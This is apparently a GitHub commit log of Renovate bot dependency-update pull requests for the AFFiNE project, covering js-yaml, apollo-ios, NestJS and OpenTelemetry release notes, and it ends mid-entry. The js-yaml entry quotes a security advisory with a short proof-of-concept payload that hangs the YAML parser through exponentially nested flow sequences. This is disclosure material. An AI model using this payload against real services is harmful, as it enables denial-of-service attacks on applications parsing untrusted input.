This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [js-yaml](https://redirect.github.com/nodeca/js-yaml) | [`^4.2.0` → `^5.0.0`](https://renovatebot.com/diffs/npm/js-yaml/4.3.0/5.2.2) |  |  | --- ### js-yaml: Exponential parsing time in flow collections leads to denial of service [GHSA-pm4m-ph32-ghv5](https://redirect.github.com/advisories/GHSA-pm4m-ph32-ghv5) <details> <summary>More information</summary> #### Details ##### Summary Parsing a small YAML document can take exponential time. An application that calls `load()` or `loadAll()` on untrusted input can be hung by a payload under 200 bytes. ##### Details When an entry in a flow sequence turns out to be a `key: value` pair, the parser rewinds and parses that entry a second time as the key. If the key is itself a nested flow sequence of the same shape, every level is parsed twice, so the total work is O(2^n) in the nesting depth. The default `maxDepth` of 100 does not help, because the time is already unmanageable at about 30 to 40 levels. Root cause, potentially the: `readFlowCollection` in [parser.ts](https://redirect.github.com/nodeca/js-yaml/blob/master/src/parser/parser.ts), the `restoreState` followed by a second `parseNode` further down. ##### PoC ```javascript const yaml = require('js-yaml') const n = 30 yaml.load('[ '.repeat(n) + '1' + ' ]: 0'.repeat(n)) ``` With default options: 22 levels takes about 1 second, 26 levels about 17 seconds, 30 levels over 2 minutes. The input stays under 200 bytes and grows linearly with `n`. ##### Impact Denial of service. A single small request can keep one CPU busy for minutes or longer and blocks the Node event loop, so one request can stall the whole process. No anchors, aliases, merges, tags, or non default options are required, and it reproduces on the default schema. #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/nodeca/js-yaml/security/advisories/GHSA-pm4m-ph32-ghv5](https://redirect.github.com/nodeca/js-yaml/security/advisories/GHSA-pm4m-ph32-ghv5) - [https://github.com/nodeca/js-yaml/commit/3e5240f9cbe645ce5afb58524954a13c8539c853](https://redirect.github.com/nodeca/js-yaml/commit/3e5240f9cbe645ce5afb58524954a13c8539c853) - [https://github.com/nodeca/js-yaml/releases/tag/5.2.2](https://redirect.github.com/nodeca/js-yaml/releases/tag/5.2.2) - [https://github.com/advisories/GHSA-pm4m-ph32-ghv5](https://redirect.github.com/advisories/GHSA-pm4m-ph32-ghv5) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-pm4m-ph32-ghv5) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>nodeca/js-yaml (js-yaml)</summary> ### [`v5.2.2`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#522---2026-07-24) [Compare Source](https://redirect.github.com/nodeca/js-yaml/compare/5.2.1...5.2.2) ##### Fixed - Quote flow scalars where a colon precedes a flow indicator, [#​773](https://redirect.github.com/nodeca/js-yaml/issues/773). ##### Security - Avoid exponential parsing time for nested flow sequence pairs. ### [`v5.2.1`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#521---2026-07-02) [Compare Source](https://redirect.github.com/nodeca/js-yaml/compare/5.2.0...5.2.1) ##### Fixed - Add `Map` support to !!omap (should work when `realMapTag` used) ##### Security - Remove quadratic complexity from !!omap `addItem`. Regression from v5 (usually not critical, because YAML11\_SCHEMA is not default anymore). ### [`v5.2.0`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#520---2026-06-26) [Compare Source](https://redirect.github.com/nodeca/js-yaml/compare/5.1.0...5.2.0) ##### Added - Added `maxTotalMergeKeys` (10000) loader option to limit the total number of keys processed by YAML merge (`<<`) across one `load()` / `loadAll()` call. - Added `maxAliases` (-1) loader option to limit the number of YAML aliases per document. ##### Removed - `maxMergeSeqLength` replaced with `maxTotalMergeKeys` for limiting YAML merge processing. ##### Fixed - Round-trip of integers with exponential form (>= `1e21`) ### [`v5.1.0`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#510---2026-06-23) [Compare Source](https://redirect.github.com/nodeca/js-yaml/compare/5.0.0...5.1.0) ##### Added - Collection tags can finalize an incrementally populated carrier into a different result value. ##### Changed - \[breaking] `quoteStyle` now selects the preferred quote style; use the restored `forceQuotes` option to force quoting non-key strings. ### [`v5.0.0`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#500---2026-06-20) [Compare Source](https://redirect.github.com/nodeca/js-yaml/compare/4.3.0...5.0.0) ##### Added - Added named exports for schemas, tags, parser events and AST utilities. - Reworked `JSON_SCHEMA` and `CORE_SCHEMA` with spec-compliant scalar resolution rules, and added `YAML11_SCHEMA`. - Added `realMapTag` for lossless mappings with non-string and complex keys. Object-based mappings now reject complex keys instead of stringifying them. - Added `dump()` `transform` option for changing the generated AST before rendering. - Added `dump()` options `seqInlineFirst`, `flowBracketPadding`, `flowSkipCommaSpace`, `flowSkipColonSpace`, `quoteFlowKeys`, `quoteStyle` and `tagBeforeAnchor`. - Added formal data layers (events and AST) for modular data pipelines. - Added low-level parser (to events), presenter and visitor APIs. - Added the [YAML Test Suite](https://redirect.github.com/yaml/yaml-test-suite) to the test set. ##### Changed - See the [migration guide](docs/migrate_v4_to_v5.md) for upgrade notes. - Rewritten in TypeScript and reorganized the public API around flat named exports. - Reduced the set of exported schemas: - YAML 1.2 schemas: `CORE_SCHEMA` (loader default), `JSON_SCHEMA`, `FAILSAFE_SCHEMA`. - `YAML11_SCHEMA`, a combination of all YAML 1.1 tags (YAML 1.1 does not specify a schema, only "types"). - `load`/`dump` default behaviour is now specified exactly via schemas: - `load` uses `CORE_SCHEMA`, without `!!merge` by default. - `dump` uses `YAML11_SCHEMA` + `CORE_SCHEMA` for the quoting check, to guarantee backward compatibility by default. - `!!set` is now loaded as a JavaScript `Set`. - Replaced the `Type` API with a tags API. Similar, but more precise and simpler. See examples for details. Tags can be defined via `defineScalarTag()`, `defineSequenceTag()` and `defineMappingTag()`, or as a spread + override of an existing tag. - Renamed `Schema.extend()` to `Schema.withTags()`. - Expanded YAML 1.2 conformance and improved handling of directives, document markers, block keys, multiline scalars, tag syntax and other things. - `load()` now throws on empty input instead of returning `undefined`. - Moved browser builds to the `js-yaml/browser` export. - Deprecated the `loadAll` signature with an iterator (still works, but is a candidate for removal). ##### Removed - Removed deprecated `safeLoad()`, `safeLoadAll()` and `safeDump()` exports. - Removed `DEFAULT_SCHEMA` and the nested `types` export. - Removed loader options `onWarning`, `legacy` and `listener`. - Removed dumper options `styles`, `replacer`, `noCompatMode`, `condenseFlow`, `quotingType` and `forceQuotes`. Renamed `noArrayIndent` to `seqNoIndent`. Formatting and representation are now configured through presenter options, schemas and tag definitions. See migration guide on how to replace. - Removed support for importing internal files from `lib/`. </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
4f3ace6e7f |
chore: bump up apollographql/apollo-ios version to v1.25.7 (#13687)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apollographql/apollo-ios](https://redirect.github.com/apollographql/apollo-ios) | patch | `from: "1.25.4"` → `from: "1.25.7"` | | [apollographql/apollo-ios](https://redirect.github.com/apollographql/apollo-ios) | patch | `1.25.4` → `1.25.7` | --- ### Release Notes <details> <summary>apollographql/apollo-ios (apollographql/apollo-ios)</summary> ### [`v1.25.7`](https://redirect.github.com/apollographql/apollo-ios/releases/tag/1.25.7) [Compare Source](https://redirect.github.com/apollographql/apollo-ios/compare/1.25.6...1.25.7) ##### Improved - **Expose `DatabaseRow` stored properties for `SQLiteDatabase` extensibility ([#​1056](https://redirect.github.com/apollographql/apollo-ios-dev/pull/1056)):** `DatabaseRow`'s stored properties (`cacheKey` and `storedInfo`) are now `public`, complementing the public initializer added in [#​664](https://redirect.github.com/apollographql/apollo-ios-dev/pull/664). This lets adopters build wrapper or decorator implementations of the public `SQLiteDatabase` protocol — for encryption, compression, logging, metrics, and similar use cases — without duplicating Apollo's SQLite implementation. This change only expands the public API surface and introduces no behavioral changes. *Thank you to [@​ErShubhShankar](https://redirect.github.com/ErShubhShankar) for the contribution.* ### [`v1.25.6`](https://redirect.github.com/apollographql/apollo-ios/releases/tag/1.25.6) [Compare Source](https://redirect.github.com/apollographql/apollo-ios/compare/1.25.5...1.25.6) ##### Fixed - **Fix `\r\n` in GraphQL descriptions generating invalid Swift comments ([#​965](https://redirect.github.com/apollographql/apollo-ios-dev/pull/965)):** GraphQL field descriptions containing `\r\n` (Windows CRLF) line endings caused codegen to emit invalid Swift — only the first line received the `///` doc comment prefix and subsequent lines were emitted as uncommented text, breaking compilation. Backport of [#​961](https://redirect.github.com/apollographql/apollo-ios-dev/pull/961). Fixes [#​3553](https://redirect.github.com/apollographql/apollo-ios/issues/3553). *Thank you to [@​iPhoneNoobDeveloper](https://redirect.github.com/iPhoneNoobDeveloper) for the contribution.* ### [`v1.25.5`](https://redirect.github.com/apollographql/apollo-ios/releases/tag/1.25.5) [Compare Source](https://redirect.github.com/apollographql/apollo-ios/compare/1.25.4...1.25.5) ##### Fixed - **Fixed concurrency crash in `compileGraphQLResult` on Swift 6.3/macOS 26 ([#​929](https://redirect.github.com/apollographql/apollo-ios-dev/pull/929)):** Serialized `async let` calls in `compileGraphQLResult` to work around a [Swift concurrency runtime crash](https://redirect.github.com/swiftlang/swift/pull/87665) triggered when code generation is used in an `AsyncParsableCommand`. See PR [#​942](https://redirect.github.com/apollographql/apollo-ios-dev/pull/942). *Thank you to [@​m4p](https://redirect.github.com/m4p) for the contribution.* </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzEuOSIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
d3975a64f4 |
chore: bump up nestjs (#15276)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.27` → `11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.27/11.1.28) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.27` → `11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.27/11.1.28) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.27` → `11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.27/11.1.28) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.27` → `11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.27/11.1.28) |  |  | | [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.4.4` → `11.4.6`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.4/11.4.6) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.27` → `11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.27/11.1.28) |  |  | --- ### Release Notes <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.28`](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) </details> <details> <summary>nestjs/nest (@​nestjs/core)</summary> ### [`v11.1.28`](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) </details> <details> <summary>nestjs/nest (@​nestjs/platform-express)</summary> ### [`v11.1.28`](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) </details> <details> <summary>nestjs/nest (@​nestjs/platform-socket.io)</summary> ### [`v11.1.28`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.28) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28) ##### v11.1.28 (2026-07-08) ##### Bug fixes - `core` - [#​17239](https://redirect.github.com/nestjs/nest/pull/17239) fix(core): trigger teardown of SSE producer Observable on client disconnect with interceptor ([@​jyx-07](https://redirect.github.com/jyx-07)) - `common` - [#​17257](https://redirect.github.com/nestjs/nest/pull/17257) fix(common): Add missing exception classes to HttpErrorByCode ([@​Se3do](https://redirect.github.com/Se3do)) - `websockets` - [#​17188](https://redirect.github.com/nestjs/nest/pull/17188) fix(websockets): correct type guard to check value not key ([@​Se3do](https://redirect.github.com/Se3do)) ##### Enhancements - `core` - [#​17241](https://redirect.github.com/nestjs/nest/pull/17241) feat(core): include auto-converted route in legacy route path warning ([@​ronielli](https://redirect.github.com/ronielli)) ##### Dependencies - `platform-fastify` - [#​17262](https://redirect.github.com/nestjs/nest/pull/17262) chore(deps): bump fastify from 5.8.5 to 5.10.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot)) - `platform-express` - [#​17164](https://redirect.github.com/nestjs/nest/pull/17164) fix(deps): update dependency multer to v2.2.0 \[security] ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) ##### Committers: 4 - Mohammed Said ([@​Se3do](https://redirect.github.com/Se3do)) - Ronielli ([@​ronielli](https://redirect.github.com/ronielli)) - greymoth ([@​greymoth-jp](https://redirect.github.com/greymoth-jp)) - 종윤 ([@​jyx-07](https://redirect.github.com/jyx-07)) </details> <details> <summary>nestjs/swagger (@​nestjs/swagger)</summary> ### [`v11.4.6`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.6) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.5...11.4.6) #### 11.4.6 (2026-07-17) ##### Features - [#​3964](https://redirect.github.com/nestjs/swagger/pull/3964) feat(plugin): infer ApiParam enum from [@​Param](https://redirect.github.com/Param) literal-union types ([@​y-hsgw](https://redirect.github.com/y-hsgw)) ##### Bug fixes - [#​3947](https://redirect.github.com/nestjs/swagger/pull/3947) fix(type-helpers): preserve array-ness for nested DTO arrays in DeepPartialType ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3945](https://redirect.github.com/nestjs/swagger/pull/3945) fix(mimetype-content-wrapper): clone object per mimetype to avoid shared references ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3972](https://redirect.github.com/nestjs/swagger/pull/3972) fix: avoid inline PickType schema collisions ([@​cyphercodes](https://redirect.github.com/cyphercodes)) - [#​3969](https://redirect.github.com/nestjs/swagger/pull/3969) fix: Added missing summary type to the response object ([@​MichielDeMey](https://redirect.github.com/MichielDeMey)) ##### Enhancements - [#​3949](https://redirect.github.com/nestjs/swagger/pull/3949) feat(api-query): support custom OpenAPI extensions ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ##### Dependencies - [#​3986](https://redirect.github.com/nestjs/swagger/pull/3986) fix(deps): update dependency js-yaml to v5 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) ##### Committers: 4 - Michiel De Mey ([@​MichielDeMey](https://redirect.github.com/MichielDeMey)) - Rayan Salhab ([@​cyphercodes](https://redirect.github.com/cyphercodes)) - Yogeshwaran C ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - Yukihiro Hasegawa ([@​y-hsgw](https://redirect.github.com/y-hsgw)) ### [`v11.4.5`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.5) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.4...11.4.5) #### What's Changed - feat(plugin): generate additionalProperties for Record/index-signature types by [@​y-hsgw](https://redirect.github.com/y-hsgw) in [#​3957](https://redirect.github.com/nestjs/swagger/pull/3957) - fix(deps): update dependency swagger-ui-dist to v5.32.8 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​3973](https://redirect.github.com/nestjs/swagger/pull/3973) - fix(deps): update dependency js-yaml to v4.2.0 \[security] by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​3988](https://redirect.github.com/nestjs/swagger/pull/3988) **Full Changelog**: <https://github.com/nestjs/swagger/compare/11.4.4...11.4.5> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNjUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjI2NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b91db2ace4 |
chore: bump up opentelemetry (#15323)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.67.0` → `^0.69.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.67.0/0.69.0) |  |  | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.67.0` → `^0.69.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.67.0/0.69.0) |  |  | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.65.0` → `^0.67.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.65.0/0.67.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.66.0` → `^0.68.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.66.0/0.68.0) |  |  | | [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.41.1` → `1.43.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.41.1/1.43.0) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-graphql)</summary> ### [`v0.69.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0690-2026-07-23) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629)) ([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86)) ### [`v0.68.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0680-2026-07-03) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593)) ([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.69.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0690-2026-07-23) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156) ##### ⚠ BREAKING CHANGES - only emit stable http, network and database attributes ([#​3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585)) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629)) ([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86)) - only emit stable http, network and database attributes ([#​3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585)) ([5b7dd0e](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/5b7dd0e102e940d653e04b08b5a1b721a8271037)) ##### Bug Fixes - **instrumentation-ioredis:** correctly mark MULTI/PIPELINE in operation name ([#​3278](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3278)) ([057847b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/057847b3a8e849b72e0d0ca63bb3a17ffef9e413)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.67.0 to ^0.68.0 ### [`v0.68.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0680-2026-07-03) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593)) ([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.66.0 to ^0.67.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-nestjs-core)</summary> ### [`v0.67.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0670-2026-07-23) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156) ##### ⚠ BREAKING CHANGES - only emit stable http, network and database attributes ([#​3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585)) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629)) ([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86)) - only emit stable http, network and database attributes ([#​3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585)) ([5b7dd0e](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/5b7dd0e102e940d653e04b08b5a1b721a8271037)) ### [`v0.66.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0660-2026-07-03) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593)) ([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.68.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0680-2026-07-23) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629)) ([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.67.0 to ^0.68.0 ### [`v0.67.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0670-2026-07-03) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593)) ([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.66.0 to ^0.67.0 </details> <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/semantic-conventions)</summary> ### [`v1.43.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/f7c090cf5ede9ce81bd8c96a092a0b549ad13c31...9b05f668ee7ab884a44b04b504e0baaff6c6d2b2) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/f7c090cf5ede9ce81bd8c96a092a0b549ad13c31...9b05f668ee7ab884a44b04b504e0baaff6c6d2b2) ### [`v1.42.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/013c60085b84351a4c1e4e4f79e3dd67c56661cd...f7c090cf5ede9ce81bd8c96a092a0b549ad13c31) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/013c60085b84351a4c1e4e4f79e3dd67c56661cd...f7c090cf5ede9ce81bd8c96a092a0b549ad13c31) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to 